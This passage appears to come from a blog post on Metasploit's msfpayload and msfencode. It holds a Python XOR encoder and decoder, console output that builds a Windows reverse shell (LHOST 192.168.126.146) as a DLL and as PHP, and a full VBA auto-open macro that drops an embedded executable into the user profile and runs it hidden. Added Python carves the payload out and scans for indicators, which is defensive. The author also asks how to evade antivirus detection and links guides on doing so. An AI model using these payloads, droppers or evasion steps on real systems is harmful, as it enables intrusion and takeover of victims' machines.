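    return out


def decode_once(blob: bytes) -> bytes:
    """Do in Python what one stub does at run time, so the result can be checked offline."""
    key = blob[14]                                              # <key> sits at offset 0x0e
    length = ~struct.unpack("<I", blob[4:8])[0] & 0xFFFFFFFF    # undo the complement
    body = blob[STUB_LEN:STUB_LEN + length]
    return bytes(b ^ key for b in body)


def decode(blob: bytes, iterations: int) -> bytes:
    """Peel off `iterations` layers, outermost first."""
    for _ in range(iterations):
        blob = decode_once(blob)
    return blob


# Constructed test payload; like the 314-byte payload above it contains 0x00 bytes.
PAYLOAD = bytes(range(64)) + b"cmd\x00"

if __name__ == "__main__":
    enc = encode(PAYLOAD, {0x00}, 3)
    print("nulls left:", 0x00 in enc, "| round trip ok:", decode(enc, 3) == PAYLOAD)
    try:
        encode(PAYLOAD, {0x00, 0xff})  # the stub itself carries 0xff, so no key can help
    except ValueError as e:
        print("[-]", e)
```

The growth per iteration is exactly STUB_LEN, which is the same pattern as 341, 368, 395, 422, 449 above (27 per pass). The failure case is instructive too: this stub hard-codes 0xff in its call and displacement bytes, so a bad-character list containing 0xff can never be satisfied no matter which key is tried; shikata_ga_nai gets around such constraints by generating different instruction sequences, which is what "polymorphic" buys you.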
http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html
The -x option makes msfencode build the executable from the specified template instead of the default one. -k keeps the template's original functionality and runs the payload in a new thread; without it the result still looks like calc.exe but does nothing except run the payload. If no directory is given with -x, the template file (calc.exe) must be in data/templates under the Metasploit install directory; -d points msfencode at a different template directory. Note also that msfencode reads the raw payload from stdin, so the msfpayload side of the pipe should emit R (raw) output rather than one of the formatted or packaged forms; the sizes reported here (341 = 314 bytes of payload plus a 27-byte decoder stub, growing by 27 per iteration) are those of the raw 314-byte payload.
Running it the way the referenced page above does, I confirmed that it executes fine. Haha
More fiddling with msfencode seems to be needed.
I will post again once I have learned more.
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 D | msfencode -o reverse_shell.dll -t dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[*] x86/shikata_ga_nai succeeded with size 14365 (iteration=1)
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 V
&H00&...(snip)...H00&
'Created by msfpayload (http://www.metasploit.com).
'Payload: windows/shell_reverse_tcp
' Length: 314
'Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
'**************************************************************
'*
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
    Bntml12
End Sub

Sub Bntml12()
    Dim Bntml7 As Integer
    Dim Bntml1 As String
    Dim Bntml2 As String
    Dim Bntml3 As Integer
    Dim Bntml4 As Paragraph
    Dim Bntml8 As Integer
    Dim Bntml9 As Boolean
    Dim Bntml5 As Integer
    Dim Bntml11 As String
    Dim Bntml6 As Byte
    Dim Ilbpdhngga As String
    ' Marker paragraph that separates the document text from the payload data
    Ilbpdhngga = "Ilbpdhngga"
    ' Randomised name of the dropped executable, written under %USERPROFILE%
    Bntml1 = "qGPLaRGNNbzhDLG.exe"
    Bntml2 = Environ("USERPROFILE")
    ChDrive (Bntml2)
    ChDir (Bntml2)
    Bntml3 = FreeFile()
    Open Bntml1 For Binary As Bntml3
    ' Walk every paragraph; once the marker has been seen, treat each paragraph
    ' as a run of 4-character "&Hxx" tokens and write the bytes to the file
    For Each Bntml4 In ActiveDocument.Paragraphs
        DoEvents
        Bntml11 = Bntml4.Range.Text
        If (Bntml9 = True) Then
            Bntml8 = 1
            While (Bntml8 < Len(Bntml11))
                Bntml6 = Mid(Bntml11, Bntml8, 4)
                Put #Bntml3, , Bntml6
                Bntml8 = Bntml8 + 4
            Wend
        ElseIf (InStr(1, Bntml11, Ilbpdhngga) > 0 And Len(Bntml11) > 0) Then
            Bntml9 = True
        End If
    Next
    Close #Bntml3
    Bntml13 (Bntml1)
End Sub

Sub Bntml13(Bntml10 As String)
    Dim Bntml7 As Integer
    Dim Bntml2 As String
    Bntml2 = Environ("USERPROFILE")
    ChDrive (Bntml2)
    ChDir (Bntml2)
    ' Launch the dropped file with a hidden window
    Bntml7 = Shell(Bntml10, vbHide)
End Sub

' Word and Excel auto-run entry points all funnel into Auto_Open
Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************
Ilbpdhngga
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HE8&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H93&H38&HF0&HD6&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HAC&H45&H92&H85&HD3&...(snip)...
It came out far too long, so I trimmed the start and the end.
I also dumped it to a file, and the size was quite large..
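What the generated macro above does, re-expressed in Python as an added example (not Metasploit's code) so that the dropped file can be recovered and checked without opening the document: it walks the paragraphs in order, ignores everything until the paragraph containing the marker string (Ilbpdhngga in this output), and from then on reads each paragraph in 4-character slices ("&H4D", "&H5A", ...) that it converts to bytes, exactly as the macro's Mid(..., 4) loop feeds Put #. The sample paragraphs are constructed from the first 16 bytes of the hex dump printed above, with the carriage return that Word's Range.Text appends to each paragraph. The indicator scan at the end is a plain regex pass over the macro source for the behaviours a defender would flag in this macro: auto-run entry points, the %USERPROFILE% drop path, the binary file write, the paragraph walk and the hidden Shell call.

```python
"""Carve and triage the payload that msfpayload's VBA output hides in a document.

Added example, not Metasploit's code. Re-implements the macro's data walk
(marker paragraph, then 4-character "&Hxx" slices written as bytes) and scans
the macro source for the behaviours the page's macro exhibits.
"""
import re

MARKER = "Ilbpdhngga"  # marker paragraph used by the output above

# Constructed document paragraphs: some text, the marker, then the first 16
# bytes of the hex dump above split across two paragraphs. Word's Range.Text
# ends each paragraph with a carriage return, which the slicing must tolerate.
PARAGRAPHS = [
    "Quarterly report\r",
    "Ilbpdhngga\r",
    "&H4D&H5A&H90&H00&H03&H00&H00&H00\r",
    "&H04&H00&H00&H00&HFF&HFF&H00&H00\r",
]


def carve_payload(paragraphs, marker: str = MARKER) -> bytes:
    """Same walk as the macro: nothing before the marker counts, everything after is data."""
    seen_marker = False
    out = bytearray()
    for text in paragraphs:
        if seen_marker:
            # Mid(text, i, 4) for i = 1, 5, 9, ... while i < Len(text)
            for i in range(0, len(text), 4):
                token = text[i:i + 4]
                if re.fullmatch(r"&H[0-9A-Fa-f]{2}", token):
                    out.append(int(token[2:], 16))
        elif marker in text and len(text) > 0:
            seen_marker = True
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """DOS 'MZ' magic: the dropped file is a full PE built from the exe template."""
    return data[:2] == b"MZ"


# (name, regex) pairs for the behaviours visible in the macro above
INDICATORS = [
    ("autorun-entry-point", r"\bSub\s+(Auto_Open|AutoOpen|Workbook_Open|Document_Open)\b"),
    ("drop-to-userprofile", r"Environ\(\s*\"USERPROFILE\"\s*\)"),
    ("binary-file-write", r"\bOpen\b.+\bFor\s+Binary\b|\bPut\s+#"),
    ("hidden-shell-exec", r"\bShell\(.*vbHide\s*\)"),
    ("paragraph-walk", r"ActiveDocument\.Paragraphs"),
]


def macro_indicators(vba_source: str) -> list[str]:
    """Return the names of the indicators present in the macro text, in INDICATORS order."""
    return [name for name, pattern in INDICATORS if re.search(pattern, vba_source)]


# Constructed excerpt of the macro printed above (identifiers kept as on the page).
MACRO_EXCERPT = """
Sub Auto_Open()
Bntml12
End Sub
Sub Bntml12()
Bntml2 = Environ("USERPROFILE")
Open Bntml1 For Binary As Bntml3
For Each Bntml4 in ActiveDocument.Paragraphs
Put #Bntml3, , Bntml6
Next
End Sub
Sub Bntml13(Bntml10 As String)
Bntml7 = Shell(Bntml10, vbHide)
End Sub
"""

if __name__ == "__main__":
    data = carve_payload(PARAGRAPHS)
    print(len(data), "bytes carved, PE:", looks_like_pe(data), data[:4])
    print("indicators:", macro_indicators(MACRO_EXCERPT))
```

With a real document, feed carve_payload the paragraph texts in document order (for a .docx, the text of each w:p element from word/document.xml); the recovered bytes start with MZ when the carve is complete, and the indicator list is the set of behaviours to write a detection rule around.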
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 W | msfencode -b '\x00'
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[-] x86/shikata_ga_nai failed: Encoding failed due to a bad character (index=194, char=0x00)
[*] php/base64 succeeded with size 91691 (iteration=1)
buf =
"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65" +
"\x63\x6f\x64\x65\x28\x55\x45\x73\x44\x42\x42\x51\x41\x41" +
"\x41\x41\x49\x41\x4c\x35\x31\x4c\x45\x41\x62\x64\x7a\x76" +
"\x6b\x52\x77\x41\x41\x41\x45\x63\x41\x41\x41\x41\x55\x41" +
"\x41\x41\x41\x54\x55\x56\x55\x51\x53\x31\x4a\x54\x6b\x59" +
"\x76\x54\x55\x46\x4f\x53\x55\x5a\x46\x55\x31\x51\x75\x54" +
...(snip)...
With the war type, specifying -t war gave the same error message as in the exe case, so I encoded it and the output came out quite long..
I had always just used msfpayload on its own to write simple shellcode, but used together with msfencode it seems pretty good.
However, the "red umbrella" antivirus I use (AhnLab V3) flags the file encoded with msfencode as malware.
When I uploaded it to VirusTotal, no fewer than 23 engines detected it.
I will need to study more, but maybe adjusting the encoder or the options could keep it from being detected? Hmm...
Reference material on evasion
Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus
http://www.irongeek.com/i.php?page=videos/msfpayload-msfencoder-metasploit-3-3
0x02 Evading anti-virus
http://linux-virus.springnote.com/pages/4330985?print=1